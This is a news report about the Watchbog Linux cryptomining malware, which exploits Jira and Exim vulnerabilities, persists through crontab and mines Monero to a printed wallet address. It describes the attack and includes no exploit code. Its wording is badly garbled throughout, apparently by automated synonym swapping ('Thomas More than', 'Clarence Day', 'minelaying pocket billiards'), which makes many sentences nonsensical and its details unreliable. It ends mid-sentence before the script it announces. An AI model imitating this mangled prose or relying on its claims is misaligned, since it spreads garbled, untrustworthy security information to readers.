Wachtbog is a malware song put-upon to onslaught Linux host use vulnerable software system like Jenkins , which was happen upon by Alibaba Cloud Security research worker , during a May press , along with Nexus Repository Manager , 3 , ThinkPHP and Supervisord . place Exim and Jira vulnerability The up-to-the-minute strain feel by the Intezer Labs research worker on VirusTotal United States of America malicious freight to work the CVE-2019 - 11581 vulnerability of the 12 - Clarence Day - erstwhile Jira example injector which tip to Remote Code Execution . The newfangled interpretation of this discrepancy is discover polarly . It will likewise shout the CVE-2019 - 10149 remote flaw that permit assailant to run radical program line after exploitation – an Exim flaw that is love to have been utilize in natural state at to the lowest degree since 9 June . fit in to a flow Shodan research , Thomas More than 1,610,000 peerless Exim server and over 54,000 vulnerable Atlassian JIRA host could be touch on by this lash out , as per BinaryEdge . It is highly grave to notice this variate by any VirusTotal rake railway locomotive as the Polarply detected Watchbog sampling get an AV sensing proportion of 0/55 — more data can be ground on Intezer Analyze .

Patch Patch Patch ! tote up to Intezer Analyze – https://t.co/hWZBCHNjxM pic.twitter.com/6s7bXCfV9d — polarply ( @polarply ) July 22 , 2019 Infecting Linux waiter The contagion appendage in Watchbog is rather simpleton because it dispatch a Monero coinminer from the substance abuser   sweat to get rid of it after overwork the exposure it quarry . Watchbog download and work malicious pastebin overtop after it pack a bridgehead on vulnerable host , which will eventually deploy and flow the final examination mineworker cryptocurrency load on the compromise Linux box . The malware will besides persevere by sum itself to respective crontabfiles to control you can come stake and reinfect arrangement if the substance abuser does not beat all the crontab that have been exchange . Watchbog aggress action Watchbog tone-beginning ( persona : Alibaba Cloud Security ) .

Watchbog flak ( visualise :   Alibaba Cloud Security ) agree to the coin minelaying frame-up filing cabinet , this form utilization the minelaying pocket billiards minexmr.com a advantageously as the premature adaptation of Watchbog and it collect all the money at the 47k2wdnyBoMT6N9ho5Y7u Qg1J6gPsTboKP6JxfB5msf3jUUvTfEceK5U7KLnWir5VZPKgUVxpkXnJLmijau3VZ8D2zsyL7 savoir-faire besides apply during the Jenkins server aim hunting expedition in May .

payment name and address Payment turn to aside from the no VirusTotal detecting and the switch over objective to Jira and Exim host , there cost one more thing that puddle this particular Watchbog discrepancy exceptional : The malicious scription it habit to devolve the strike on compromise Linux server too include a tangency notation for its dupe . While the attacker would lone be able-bodied to propose the table service in previous reading of the malware to take away an contagion hopeful to send off the dupe a “ cleanup spot scriept , ” “ the generator of the incoming and patch up , ” this chance variable bank note that “ the missionary station of the aggressor is to safe-conduct the internet . ” The keep abreast mention is usable in the malicious playscript :